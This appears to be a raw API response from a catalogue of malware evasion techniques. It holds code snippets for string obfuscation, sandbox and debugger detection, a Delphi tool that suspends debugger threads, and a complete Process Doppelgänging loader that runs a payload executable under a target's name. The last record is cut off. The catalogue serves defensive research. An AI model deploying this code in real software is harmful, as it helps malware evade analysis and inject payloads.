GET /api/snippets/?page=2
HTTP 200 OK
Allow: GET, POST, HEAD, OPTIONS
Content-Type: application/json
Vary: Accept

{
    "count": 66,
    "next": null,
    "previous": "https://search.unprotect.it/api/snippets/",
    "results": [
        {
            "language": "https://search.unprotect.it/api/snippet_languages/4/",
            "author": "https://search.unprotect.it/api/snippet_authors/2/",
            "technique": "https://search.unprotect.it/api/techniques/97/",
            "description": "",
            "plain_code": "package main\r\n\r\nimport (\r\n    \"fmt\"\r\n    \"os\"\r\n)\r\n\r\nfunc cipher(text string, direction int) string {\r\n\r\n        shift, offset := rune(3), rune(26)\r\n\trunes := []rune(text)\r\n\r\n        for index, char := range runes {\r\n\t\tswitch direction {\r\n\t\tcase -1: // encoding\r\n\t\t\tif char >= 'a'+shift && char <= 'z' ||\r\n\t\t\t\tchar >= 'A'+shift && char <= 'Z' {\r\n\t\t\t\tchar = char - shift\r\n\t\t\t} else if char >= 'a' && char < 'a'+shift ||\r\n\t\t\t\tchar >= 'A' && char < 'A'+shift {\r\n\t\t\t\tchar = char - shift + offset\r\n\t\t\t}\r\n\t\tcase +1: // decoding\r\n\t\t\tif char >= 'a' && char <= 'z'-shift ||\r\n\t\t\t\tchar >= 'A' && char <= 'Z'-shift {\r\n\t\t\t\tchar = char + shift\r\n\t\t\t} else if char > 'z'-shift && char <= 'z' ||\r\n\t\t\t\tchar > 'Z'-shift && char <= 'Z' {\r\n\t\t\t\tchar = char + shift - offset\r\n\t\t\t}\r\n\t\t}\r\n\t\trunes[index] = char\r\n\t}\r\n\treturn string(runes)\r\n}\r\n\r\nfunc encode(text string) string { return cipher(text, -1) }\r\nfunc decode(text string) string { return cipher(text, +1) }\r\n\r\nfunc main() {\r\n\tsec := os.Args[1]\r\n        fmt.Println(\"[+] Clear text: \" + sec)\r\n\tencoded := encode(sec)\r\n\tfmt.Println(\"[+] Encoded: \" + encoded)\r\n\tdecoded := decode(encoded)\r\n\tfmt.Println(\"[+] Decoded: \" + decoded)\r\n}"
        },
        {
            "language": "https://search.unprotect.it/api/snippet_languages/4/",
            "author": "https://search.unprotect.it/api/snippet_authors/2/",
            "technique": "https://search.unprotect.it/api/techniques/96/",
            "description": "",
            "plain_code": "package main\r\n\r\nimport (\r\n    \"encoding/base64\"\r\n    \"fmt\"\r\n    \"os\"\r\n)\r\n\r\nfunc main() {\r\n\r\n    arg1 := os.Args[1]\r\n\r\n    encoded := base64.StdEncoding.EncodeToString([]byte(arg1))\r\n    fmt.Println(encoded)\r\n\r\n    decoded, err := base64.StdEncoding.DecodeString(encoded)\r\n    if err != nil {\r\n        panic(\"error\")\r\n    }\r\n    fmt.Println(string(decoded))\r\n}"
        },
        {
            "language": "https://search.unprotect.it/api/snippet_languages/2/",
            "author": "https://search.unprotect.it/api/snippet_authors/3/",
            "technique": "https://search.unprotect.it/api/techniques/58/",
            "description": "",
            "plain_code": "#define WIN32_LEAN_AND_MEAN\r\n#include <stdio.h>\r\n#include <iostream>\r\n#include <stdlib.h>\r\n#include <windows.h>\r\n#include \"defs.h\"\r\n\r\n\r\n#pragma comment(lib,\"ntdll.lib\")\r\n#pragma comment(lib,\"psapi.lib\")\r\n\r\n\r\nvoid QueryProcessHeapMethod(void)\r\n{\r\n    PDEBUG_BUFFER buffer;\r\n    buffer = RtlCreateQueryDebugBuffer(0,FALSE);\r\n    RtlQueryProcessHeapInformation(buffer);\r\n\r\n    if (buffer->RemoteSectionBase == (PVOID) 0x50000062){\r\n        MessageBoxA(NULL,\"Debugged\",\"Warning\",MB_OK);\r\n    }\r\n    else {\r\n        MessageBoxA(NULL,\"Not Debugged\",\"Warning\",MB_OK);\r\n    }\r\n    if (buffer->EventPairHandle == (PVOID) 0x00002b98) {\r\n        MessageBoxA(NULL,\"Debugged\",\"Warning\",MB_OK);\r\n    }\r\n    else {\r\n        MessageBoxA(NULL,\"Not Debugged\",\"Warning\",MB_OK);\r\n        printf(\"EventPairHandle= %x\",(int)buffer->EventPairHandle);\r\n    }\r\n}\r\nint main()\r\n{\r\n    QueryProcessHeapMethod();\r\n    return (EXIT_SUCCESS);\r\n}"
        },
        {
            "language": "https://search.unprotect.it/api/snippet_languages/2/",
            "author": "https://search.unprotect.it/api/snippet_authors/3/",
            "technique": "https://search.unprotect.it/api/techniques/119/",
            "description": "",
            "plain_code": "// Ref = src\r\n// https://www.blackhat.com/docs/eu-17/materials/eu-17-Liberman-Lost-In-Transaction-Process-Doppelganging.pdf\r\n//\r\n// Credits:\r\n//  Vyacheslav Rusakov @swwwolf\r\n//  Tom Bonner @thomas_bonner\r\n//\r\n\r\n#include <Windows.h>\r\n#include <ntstatus.h>\r\n#include \"ntos.h\"\r\n\r\nVOID ProcessDoppelgänging(\r\n    _In_ LPWSTR lpTargetApp,\r\n    _In_ LPWSTR lpPayloadApp)\r\n{\r\n    BOOL bCond = FALSE;\r\n    NTSTATUS status;\r\n    HANDLE hTransaction = NULL, hTransactedFile = INVALID_HANDLE_VALUE, hFile = INVALID_HANDLE_VALUE;\r\n    HANDLE hSection = NULL, hProcess = NULL, hThread = NULL;\r\n    LARGE_INTEGER fsz;\r\n    ULONG ReturnLength = 0;\r\n    ULONG_PTR EntryPoint = 0, ImageBase = 0;\r\n    PVOID Buffer = NULL, MemoryPtr = NULL;\r\n    SIZE_T sz = 0;\r\n    PEB *Peb;\r\n\r\n    PROCESS_BASIC_INFORMATION pbi;\r\n\r\n    PRTL_USER_PROCESS_PARAMETERS ProcessParameters = NULL;\r\n\r\n    OBJECT_ATTRIBUTES obja;\r\n    UNICODE_STRING    ustr;\r\n\r\n    BYTE temp[0x1000];\r\n\r\n    do {\r\n        RtlSecureZeroMemory(&temp, sizeof(temp));\r\n\r\n        //\r\n        // Create TmTx transaction object.\r\n        //\r\n        InitializeObjectAttributes(&obja, NULL, 0, NULL, NULL);\r\n        status = NtCreateTransaction(&hTransaction,\r\n            TRANSACTION_ALL_ACCESS,\r\n            &obja,\r\n            NULL,\r\n            NULL,\r\n            0,\r\n            0,\r\n            0,\r\n            NULL,\r\n            NULL);\r\n\r\n        if (!NT_SUCCESS(status)) {\r\n            OutputDebugString(L\"NtCreateTransaction fail\");\r\n            break;\r\n        }\r\n\r\n        //\r\n        // Open target file for transaction.\r\n        //\r\n        hTransactedFile = CreateFileTransacted(lpTargetApp,\r\n            GENERIC_WRITE | GENERIC_READ,\r\n            0,\r\n            NULL,\r\n            OPEN_EXISTING,\r\n            FILE_ATTRIBUTE_NORMAL,\r\n            NULL,\r\n            hTransaction,\r\n            NULL,\r\n            NULL);\r\n\r\n        if (hTransactedFile == INVALID_HANDLE_VALUE) {\r\n            OutputDebugString(L\"CreateFileTransacted fail\");\r\n            break;\r\n        }\r\n\r\n        //\r\n        // Open file payload.\r\n        //\r\n        hFile = CreateFile(lpPayloadApp,\r\n            GENERIC_READ,\r\n            0,\r\n            NULL,\r\n            OPEN_EXISTING,\r\n            FILE_ATTRIBUTE_NORMAL,\r\n            NULL);\r\n        if (hFile == INVALID_HANDLE_VALUE) {\r\n            OutputDebugString(L\"CreateFile(target) failed\");\r\n            break;\r\n        }\r\n\r\n        //\r\n        // Query payload file size.\r\n        //\r\n        if (!GetFileSizeEx(hFile, &fsz)) {\r\n            OutputDebugString(L\"GetFileSizeEx(target) failed\");\r\n            break;\r\n        }\r\n\r\n        //\r\n        // Allocate buffer for payload file.\r\n        //\r\n        Buffer = NULL;\r\n        sz = (SIZE_T)fsz.LowPart;\r\n        status = NtAllocateVirtualMemory(NtCurrentProcess(),\r\n            &Buffer,\r\n            0,\r\n            &sz,\r\n            MEM_COMMIT | MEM_RESERVE,\r\n            PAGE_READWRITE);\r\n\r\n        if (!NT_SUCCESS(status)) {\r\n            OutputDebugString(L\"NtAllocateVirtualMemory(fsz.LowPart) failed\");\r\n            break;\r\n        }\r\n\r\n        //\r\n        // Read payload file to the buffer.\r\n        //\r\n        if (!ReadFile(hFile, Buffer, fsz.LowPart, &ReturnLength, NULL)) {\r\n            OutputDebugString(L\"ReadFile(hFile, Buffer) failed\");\r\n            break;\r\n        }\r\n\r\n        CloseHandle(hFile);\r\n        hFile = INVALID_HANDLE_VALUE;\r\n\r\n        //\r\n        // Write buffer into transaction.\r\n        //\r\n        if (!WriteFile(hTransactedFile, Buffer, fsz.LowPart, &ReturnLength, NULL)) {\r\n            OutputDebugString(L\"WriteFile(hTransactedFile, Buffer) failed\");\r\n            break;\r\n        }\r\n\r\n        //\r\n        // Create section from transacted file.\r\n        //\r\n        status = NtCreateSection(&hSection,\r\n            SECTION_ALL_ACCESS,\r\n            NULL,\r\n            0,\r\n            PAGE_READONLY,\r\n            SEC_IMAGE,\r\n            hTransactedFile);\r\n        if (!NT_SUCCESS(status)) {\r\n            OutputDebugString(L\"NtCreateSection(hTransactedFile) failed\");\r\n            break;\r\n        }\r\n\r\n        status = NtRollbackTransaction(hTransaction, TRUE);\r\n        if (!NT_SUCCESS(status)) {\r\n            OutputDebugString(L\"NtRollbackTransaction(hTransaction) failed\");\r\n            break;\r\n        }\r\n\r\n        NtClose(hTransaction);\r\n        hTransaction = NULL;\r\n\r\n        CloseHandle(hTransactedFile);\r\n        hTransactedFile = INVALID_HANDLE_VALUE;\r\n\r\n        //\r\n        // Create process object with transacted section.\r\n        //\r\n        //\r\n        // Warning: due to MS brilliant coding skills (NULL ptr dereference) \r\n        //          this call will trigger BSOD on Windows 10 prior to RS3.\r\n        //\r\n        hProcess = NULL;\r\n        status = NtCreateProcessEx(&hProcess,\r\n            PROCESS_ALL_ACCESS,\r\n            NULL,\r\n            NtCurrentProcess(),\r\n            PS_INHERIT_HANDLES,\r\n            hSection,\r\n            NULL,\r\n            NULL,\r\n            FALSE);\r\n\r\n        if (!NT_SUCCESS(status)) {\r\n            OutputDebugString(L\"NtCreateProcessEx(hSection) failed\");\r\n            break;\r\n        }\r\n\r\n        //\r\n        // Query payload file entry point value.\r\n        //\r\n        status = NtQueryInformationProcess(hProcess,\r\n            ProcessBasicInformation,\r\n            &pbi,\r\n            sizeof(PROCESS_BASIC_INFORMATION),\r\n            &ReturnLength);\r\n\r\n        if (!NT_SUCCESS(status)) {\r\n            OutputDebugString(L\"NtQueryInformationProcess failed\");\r\n            break;\r\n        }\r\n\r\n        status = NtReadVirtualMemory(hProcess, pbi.PebBaseAddress, &temp, 0x1000, &sz);\r\n        if (!NT_SUCCESS(status)) {\r\n            OutputDebugString(L\"NtReadVirtualMemory failed\");\r\n            break;\r\n        }\r\n\r\n        EntryPoint = (ULONG_PTR)RtlImageNtHeader(Buffer)->OptionalHeader.AddressOfEntryPoint;\r\n        EntryPoint += (ULONG_PTR)((PPEB)temp)->ImageBaseAddress;\r\n\r\n        //\r\n        // Create process parameters block.\r\n        //\r\n        //RtlInitUnicodeString(&ustr, L\"C:\\\\windows\\\\system32\\\\svchost.exe\");\r\n        RtlInitUnicodeString(&ustr, lpTargetApp);\r\n        status = RtlCreateProcessParametersEx(&ProcessParameters,\r\n            &ustr,\r\n            NULL,\r\n            NULL,\r\n            &ustr,\r\n            NULL,\r\n            NULL,\r\n            NULL,\r\n            NULL,\r\n            NULL,\r\n            RTL_USER_PROC_PARAMS_NORMALIZED);\r\n\r\n        if (!NT_SUCCESS(status)) {\r\n            OutputDebugString(L\"RtlCreateProcessParametersEx failed\");\r\n            break;\r\n        }\r\n\r\n        //\r\n        // Allocate memory in target process and write process parameters block.\r\n        //\r\n        sz = ProcessParameters->EnvironmentSize + ProcessParameters->MaximumLength;\r\n        MemoryPtr = ProcessParameters;\r\n\r\n        status = NtAllocateVirtualMemory(hProcess,\r\n            &MemoryPtr,\r\n            0,\r\n            &sz,\r\n            MEM_RESERVE | MEM_COMMIT,\r\n            PAGE_READWRITE);\r\n\r\n        if (!NT_SUCCESS(status)) {\r\n            OutputDebugString(L\"NtAllocateVirtualMemory(ProcessParameters) failed\");\r\n            break;\r\n        }\r\n\r\n        sz = 0;\r\n        status = NtWriteVirtualMemory(hProcess,\r\n            ProcessParameters,\r\n            ProcessParameters,\r\n            ProcessParameters->EnvironmentSize + ProcessParameters->MaximumLength,\r\n            &sz);\r\n\r\n        if (!NT_SUCCESS(status)) {\r\n            OutputDebugString(L\"NtWriteVirtualMemory(ProcessParameters) failed\");\r\n            break;\r\n        }\r\n\r\n        //\r\n        // Update PEB->ProcessParameters pointer to newly allocated block.\r\n        //\r\n        Peb = pbi.PebBaseAddress;\r\n        status = NtWriteVirtualMemory(hProcess,\r\n            &Peb->ProcessParameters,\r\n            &ProcessParameters,\r\n            sizeof(PVOID),\r\n            &sz);\r\n        if (!NT_SUCCESS(status)) {\r\n            OutputDebugString(L\"NtWriteVirtualMemory(Peb->ProcessParameters) failed\");\r\n            break;\r\n        }\r\n\r\n        //\r\n        // Create primary thread.\r\n        //\r\n        hThread = NULL;\r\n        status = NtCreateThreadEx(&hThread,\r\n            THREAD_ALL_ACCESS,\r\n            NULL,\r\n            hProcess,\r\n            (LPTHREAD_START_ROUTINE)EntryPoint,\r\n            NULL,\r\n            FALSE,\r\n            0,\r\n            0,\r\n            0,\r\n            NULL);\r\n        if (!NT_SUCCESS(status)) {\r\n            OutputDebugString(L\"NtCreateThreadEx(EntryPoint) failed\");\r\n            break;\r\n        }\r\n\r\n    } while (bCond);\r\n\r\n    if (hTransaction)\r\n        NtClose(hTransaction);\r\n    if (hSection)\r\n        NtClose(hSection);\r\n    if (hProcess)\r\n        NtClose(hProcess);\r\n    if (hThread)\r\n        NtClose(hThread);\r\n    if (hTransactedFile != INVALID_HANDLE_VALUE)\r\n        CloseHandle(hTransactedFile);\r\n    if (hFile != INVALID_HANDLE_VALUE)\r\n        CloseHandle(hFile);\r\n    if (Buffer != NULL) {\r\n        sz = 0;\r\n        NtFreeVirtualMemory(NtCurrentProcess(), &Buffer, &sz, MEM_RELEASE);\r\n    }\r\n    if (ProcessParameters) {\r\n        RtlDestroyProcessParameters(ProcessParameters);\r\n    }\r\n}\r\n\r\nvoid main()\r\n{\r\n    ProcessDoppelgänging(L\"C:\\\\test\\\\target.exe\", L\"C:\\\\test\\\\payload.exe\");\r\n    ExitProcess(0);\r\n}"
        },
        {
            "language": "https://search.unprotect.it/api/snippet_languages/2/",
            "author": "https://search.unprotect.it/api/snippet_authors/2/",
            "technique": "https://search.unprotect.it/api/techniques/35/",
            "description": "",
            "plain_code": "#include <iostream>\r\n#include <windows.h>\r\n\r\nint WINAPI WinMain ( HINSTANCE, HINSTANCE, LPSTR, int )\r\n{\r\n  char  ComputerName [MAX_COMPUTERNAME_LENGTH + 1];\r\n  DWORD cbComputerName = sizeof ( ComputerName );\r\n\r\n  if ( GetComputerName ( ComputerName, &cbComputerName ))\r\n     { \r\n         MessageBox ( NULL, ComputerName, \"Computer Name:\", MB_OK | MB_ICONINFORMATION ); \r\n     } \r\n}"
        },
        {
            "language": "https://search.unprotect.it/api/snippet_languages/2/",
            "author": "https://search.unprotect.it/api/snippet_authors/2/",
            "technique": "https://search.unprotect.it/api/techniques/31/",
            "description": "",
            "plain_code": "#include \"wtypes.h\"\r\n#include <iostream>\r\nusing namespace std;\r\n\r\n/*\r\n1024x768 can be used for automated Sandbox\r\n800x600 can be used for automated Sandbox\r\n640x480 can be used for automated Sandbox\r\n1024x697\r\n1280x800\r\n1280x960\r\n1680x1050\r\n1916x1066\r\n*/\r\n\r\nvoid GetResolution(int& horiz, int& verti)\r\n{\r\n   RECT desktop;\r\n   const HWND hDesktop = GetDesktopWindow();\r\n   GetWindowRect(hDesktop, &desktop);\r\n   horiz = desktop.right;\r\n   verti = desktop.bottom;\r\n}\r\n\r\nint main()\r\n{\r\n   int horiz = 0;\r\n   int verti = 0;\r\n   GetResolution(horiz, verti);\r\n\r\n   if(horiz < 1024)\r\n   {\r\n      cout << \"[!] Looks like you run in a sandbox!\"<< '\\n';\r\n   }\r\n\r\n   cout << \"[+] Screen resolution: \"<< horiz << \"x\" << verti << '\\n';\r\n   return 0;\r\n}"
        },
        {
            "language": "https://search.unprotect.it/api/snippet_languages/1/",
            "author": "https://search.unprotect.it/api/snippet_authors/1/",
            "technique": "https://search.unprotect.it/api/techniques/109/",
            "description": "You can compile this unit as a classic Delphi Console Application. Feel free to edit both `LFindWindowSignatures` and `LProcessNameSignatures` to support more debuggers.",
            "plain_code": "program SuspendThread;\r\n\r\n{$APPTYPE CONSOLE}\r\n\r\nuses\r\n  WinAPI.Windows, System.SysUtils, Generics.Collections, tlHelp32, Classes;\r\n\r\ntype\r\n  TProcessItem = class\r\n  private\r\n    FName      : String;\r\n    FProcessId : Cardinal;\r\n    FThreads   : TList<Cardinal>;\r\n\r\n    {@M}\r\n    procedure EnumThreads();\r\n  public\r\n    {@C}\r\n    constructor Create(AName : String; AProcessId : Cardinal; AEnumThreads : Boolean = True);\r\n    destructor Destroy(); override;\r\n\r\n    {@G}\r\n    property Name      : String          read FName;\r\n    property ProcessId : Cardinal        read FProcessId;\r\n    property Threads   : TList<Cardinal> read FThreads;\r\n  end;\r\n\r\n  TEnumProcess = class\r\n  private\r\n    FItems : TObjectList<TProcessItem>;\r\n  public\r\n    {@C}\r\n    constructor Create();\r\n    destructor Destroy(); override;\r\n\r\n    {@M}\r\n    function Refresh() : Cardinal;\r\n    procedure Clear();\r\n\r\n    function Get(AProcessId : Cardinal) : TProcessItem; overload;\r\n    function Get(AName : String) : TProcessItem; overload;\r\n\r\n    {@G}\r\n    property Items : TObjectList<TProcessItem> read FItems;\r\n  end;\r\n\r\n{\r\n  Import API's From Kernel32\r\n}\r\nconst THREAD_SUSPEND_RESUME = $00000002;\r\n\r\nfunction OpenThread(\r\n                      dwDesiredAccess: DWORD;\r\n                      bInheritHandle: BOOL;\r\n                      dwThreadId: DWORD\r\n          ) : THandle; stdcall; external kernel32 name 'OpenThread';\r\n\r\n{\r\n  Global Vars\r\n}\r\nvar LFindWindowSignatures  : TDictionary<String, String>;\r\n    LProcessNameSignatures : TStringList;\r\n    LProcesses             : TEnumProcess;\r\n\r\n{+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\r\n  Process Item (Process Name / Process Id / Process Main Thread Id)\r\n+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++}\r\n\r\n{-------------------------------------------------------------------------------\r\n  ___constructor\r\n-------------------------------------------------------------------------------}\r\nconstructor TProcessItem.Create(AName : String; AProcessId : Cardinal; AEnumThreads : Boolean = True);\r\nbegin\r\n  FName      := AName;\r\n  FProcessId := AProcessId;\r\n\r\n  FThreads := TList<Cardinal>.Create();\r\n\r\n  if AEnumThreads then\r\n    self.EnumThreads();\r\nend;\r\n\r\n{-------------------------------------------------------------------------------\r\n  ___destructor\r\n-------------------------------------------------------------------------------}\r\ndestructor TProcessItem.Destroy();\r\nbegin\r\n  if Assigned(FThreads) then\r\n    FreeAndNil(FThreads);\r\n\r\n  ///\r\n  inherited Destroy();\r\nend;\r\n\r\n{-------------------------------------------------------------------------------\r\n  Enumerate Threads of process object\r\n-------------------------------------------------------------------------------}\r\nprocedure TProcessItem.EnumThreads();\r\nvar ASnap        : THandle;\r\n    AThreadEntry : TThreadEntry32;\r\n\r\n    procedure InitializeItem();\r\n    begin\r\n      ZeroMemory(@AThreadEntry, SizeOf(TThreadEntry32));\r\n\r\n      AThreadEntry.dwSize := SizeOf(TThreadEntry32);\r\n    end;\r\n\r\n    procedure AppendItem();\r\n    begin\r\n      if (AThreadEntry.th32OwnerProcessID <> FProcessId) then\r\n        Exit();\r\n      ///\r\n\r\n      FThreads.Add(AThreadEntry.th32ThreadID);\r\n    end;\r\nbegin\r\n  if NOT Assigned(FThreads) then\r\n    Exit();\r\n  ///\r\n\r\n  FThreads.Clear();\r\n  ///\r\n\r\n  ASnap := CreateToolHelp32Snapshot(TH32CS_SNAPTHREAD, 0);\r\n  if (ASnap = INVALID_HANDLE_VALUE) then\r\n    Exit();\r\n  try\r\n    InitializeItem();\r\n\r\n    if NOT Thread32First(ASnap, AThreadEntry) then\r\n      Exit();\r\n\r\n    AppendItem();\r\n\r\n    while True do begin\r\n      InitializeItem();\r\n\r\n      if NOT Thread32Next(ASnap, AThreadEntry) then\r\n        break;\r\n\r\n      AppendItem();\r\n    end;\r\n  finally\r\n    CloseHandle(ASnap);\r\n  end;\r\nend;\r\n\r\n{+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\r\n  Enumerate Process Class\r\n+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++}\r\n\r\n{-------------------------------------------------------------------------------\r\n  ___constructor\r\n-------------------------------------------------------------------------------}\r\nconstructor TEnumProcess.Create();\r\nbegin\r\n  FItems := TObjectList<TProcessItem>.Create();\r\n  FItems.OwnsObjects := True;\r\n\r\n  ///\r\n  self.Refresh();\r\nend;\r\n\r\n{-------------------------------------------------------------------------------\r\n  ___destructor\r\n-------------------------------------------------------------------------------}\r\ndestructor TEnumProcess.Destroy();\r\nbegin\r\n  if Assigned(FItems) then\r\n    FreeAndNil(FItems);\r\n\r\n  ///\r\n  inherited Destroy();\r\nend;\r\n\r\n{-------------------------------------------------------------------------------\r\n  Enumerate Running Process.\r\n  @Return: Process Count\r\n-------------------------------------------------------------------------------}\r\nfunction TEnumProcess.Refresh() : Cardinal;\r\nvar ASnap         : THandle;\r\n    AProcessEntry : TProcessEntry32;\r\n\r\n    procedure InitializeItem();\r\n    begin\r\n      ZeroMemory(@AProcessEntry, SizeOf(TProcessEntry32));\r\n\r\n      AProcessEntry.dwSize := SizeOf(TProcessEntry32);\r\n    end;\r\n\r\n    procedure AppendItem();\r\n    var AItem : TProcessItem;\r\n    begin\r\n      AItem := TProcessItem.Create(\r\n                                    AProcessEntry.szExeFile,\r\n                                    AProcessEntry.th32ProcessID,\r\n                                    True {Enum Threads: Default}\r\n      );\r\n\r\n      FItems.Add(AItem);\r\n    end;\r\n\r\nbegin\r\n  result := 0;\r\n  ///\r\n\r\n  if NOT Assigned(FItems) then\r\n    Exit();\r\n  ///\r\n\r\n  self.Clear();\r\n\r\n  ASnap := CreateToolHelp32Snapshot(TH32CS_SNAPPROCESS, 0);\r\n  if (ASnap = INVALID_HANDLE_VALUE) then\r\n    Exit();\r\n  try\r\n    InitializeItem();\r\n\r\n    if NOT Process32First(ASnap, AProcessEntry) then\r\n      Exit();\r\n\r\n    AppendItem();\r\n\r\n    while True do begin\r\n      InitializeItem();\r\n\r\n      if NOT Process32Next(ASnap, AProcessEntry) then\r\n        break;\r\n\r\n      AppendItem();\r\n    end;\r\n  finally\r\n    CloseHandle(ASnap);\r\n  end;\r\nend;\r\n\r\n{-------------------------------------------------------------------------------\r\n  Clear Items (Process Objects)\r\n-------------------------------------------------------------------------------}\r\nprocedure TEnumProcess.Clear();\r\nbegin\r\n  if Assigned(FItems) then\r\n    FItems.Clear;\r\nend;\r\n\r\n{-------------------------------------------------------------------------------\r\n  Get Process Item by Process Id or Name\r\n-------------------------------------------------------------------------------}\r\nfunction TEnumProcess.Get(AProcessId : Cardinal) : TProcessItem;\r\nvar AItem : TProcessItem;\r\n    I     : Integer;\r\nbegin\r\n  result := nil;\r\n  ///\r\n\r\n  for I := 0 to self.Items.count -1 do begin\r\n    AItem := self.Items.Items[I];\r\n    if NOT Assigned(AItem) then\r\n      continue;\r\n    ///\r\n\r\n    if (AItem.ProcessId = AProcessId) then begin\r\n      result := AItem;\r\n\r\n      Break;\r\n    end;\r\n  end;\r\nend;\r\n\r\nfunction TEnumProcess.Get(AName : String) : TProcessItem;\r\nvar AItem : TProcessItem;\r\n    I     : Integer;\r\nbegin\r\n  result := nil;\r\n  ///\r\n\r\n  for I := 0 to self.Items.count -1 do begin\r\n    AItem := self.Items.Items[I];\r\n    if NOT Assigned(AItem) then\r\n      continue;\r\n    ///\r\n\r\n    if (AItem.Name.ToLower = AName.ToLower) then begin\r\n      result := AItem;\r\n\r\n      Break;\r\n    end;\r\n  end;\r\nend;\r\n\r\n{+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\r\n  Main\r\n+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++}\r\n\r\n{-------------------------------------------------------------------------------\r\n  Suspend Threads of target process.\r\n-------------------------------------------------------------------------------}\r\nfunction SuspendThreadsByProcessId(AProcessId : Cardinal) : Boolean;\r\nvar AItem     : TProcessItem;\r\n    AThreadId : Cardinal;\r\n    I         : Integer;\r\n    AThread   : THandle;\r\nbegin\r\n  result := False;\r\n  ///\r\n\r\n  if NOT Assigned(LProcesses) then\r\n    Exit();\r\n\r\n  AItem := LProcesses.Get(AProcessId);\r\n  if NOT Assigned(AItem) then\r\n    Exit();\r\n  ///\r\n\r\n  if (AItem.Threads.count = 0) then\r\n    Exit();\r\n  ///\r\n\r\n  for I := 0 to AItem.Threads.Count -1 do begin\r\n    AThreadId := AItem.Threads.Items[I];\r\n    ///\r\n\r\n    AThread := OpenThread(THREAD_SUSPEND_RESUME, False, AThreadId);\r\n    if (AThread = 0) then\r\n      continue;\r\n    try\r\n      WriteLn(Format('Suspending: %s(%d), Thread Id: %d...', [\r\n                                                                    AItem.Name,\r\n                                                                    AItem.ProcessId,\r\n                                                                    AThreadId\r\n      ]));\r\n\r\n      WinAPI.Windows.SuspendThread(AThread);\r\n\r\n      result := True;\r\n    finally\r\n      CloseHandle(AThread);\r\n    end;\r\n  end;\r\nend;\r\n\r\n{-------------------------------------------------------------------------------\r\n  FindWindow API Example\r\n-------------------------------------------------------------------------------}\r\nfunction method_FindWindow() : Boolean;\r\nvar AHandle     : THandle;\r\n    AProcessId  : Cardinal;\r\n    AClassName  : String;\r\n    AWindowName : String;\r\n    pClassName  : Pointer;\r\n    pWindowName : Pointer;\r\nbegin\r\n  result := False;\r\n  ///\r\n\r\n  for AClassName in LFindWindowSignatures.Keys do begin\r\n    if NOT LFindWindowSignatures.TryGetValue(AClassName, AWindowName) then\r\n      continue;\r\n    ///\r\n\r\n    pClassName  := nil;\r\n    pWindowName := nil;\r\n\r\n    if NOT AClassName.isEmpty then\r\n      pClassName := PWideChar(AClassName);\r\n\r\n    if NOT AWindowName.isEmpty then\r\n      pWindowName := PWideChar(AWindowName);\r\n\r\n    AHandle := FindWindowW(pClassName, pWindowName);\r\n    if (AHandle > 0) then begin\r\n      GetWindowThreadProcessId(AHandle, @AProcessId);\r\n      if (AProcessId > 0) then\r\n        SuspendThreadsByProcessId(AProcessId);\r\n\r\n      ///\r\n      result := True;\r\n    end;\r\n  end;\r\nend;\r\n\r\n{-------------------------------------------------------------------------------\r\n  Find Process Example (Uses the TEnumProcess Class) - See above\r\n-------------------------------------------------------------------------------}\r\nfunction method_FindProcess() : Boolean;\r\nvar AItem : TProcessItem;\r\n    AName : String;\r\n    I     : Integer;\r\nbegin\r\n  result := False;\r\n  ///\r\n\r\n  for I := 0 to LProcessNameSignatures.count -1 do begin\r\n    AName := LProcessNameSignatures.Strings[I];\r\n\r\n    AItem := LProcesses.Get(AName);\r\n    if (NOT Assigned(AItem)) then\r\n      continue;\r\n    ///\r\n\r\n    SuspendThreadsByProcessId(AItem.ProcessId);\r\n\r\n    ///\r\n    result := True;\r\n  end;\r\nend;\r\n\r\n{-------------------------------------------------------------------------------\r\n  ___entry\r\n-------------------------------------------------------------------------------}\r\nbegin\r\n  try\r\n    LProcesses := TEnumProcess.Create();\r\n    try\r\n      // FindWindow API\r\n      LFindWindowSignatures := TDictionary<String, String>.Create();\r\n      try\r\n        {\r\n          ...\r\n\r\n          @Param1: ClassName  (Empty = NULL)\r\n          @Param2: WindowName (Empty = NULL)\r\n\r\n          Add your own signatures bellow...\r\n        }\r\n        LFindWindowSignatures.Add('OLLYDBG', '');\r\n        {\r\n          ...\r\n        }\r\n        method_FindWindow();\r\n      finally\r\n        if Assigned(LFindWindowSignatures) then\r\n          FreeAndNil(LFindWindowSignatures);\r\n      end;\r\n\r\n      // Find by Process Name\r\n      LProcessNameSignatures := TStringList.Create();\r\n      try\r\n        {\r\n          ...\r\n\r\n          @Param1: Process Name (Example: OllyDbg.exe) - Case Insensitive\r\n\r\n          Add your own signatures bellow...\r\n        }\r\n        LProcessNameSignatures.Add('ImmunityDebugger.exe');\r\n        {\r\n          ...\r\n        }\r\n        method_FindProcess();\r\n      finally\r\n        if Assigned(LProcessNameSignatures) then\r\n          FreeAndNil(LProcessNameSignatures);\r\n      end;\r\n    finally\r\n      if Assigned(LProcesses) then\r\n        FreeAndNil(LProcesses);\r\n    end;\r\n  except\r\n    on E: Exception do\r\n      Writeln(E.ClassName, ': ', E.Message);\r\n  end;\r\nend."
        },
        {
            "language": "https://search.unprotect.it/api/snippet_languages/2/",
            "author": "https://search.unprotect.it/api/snippet_authors/2/",
            "technique": "https://search.unprotect.it/api/techniques/11/",
            "description": "",
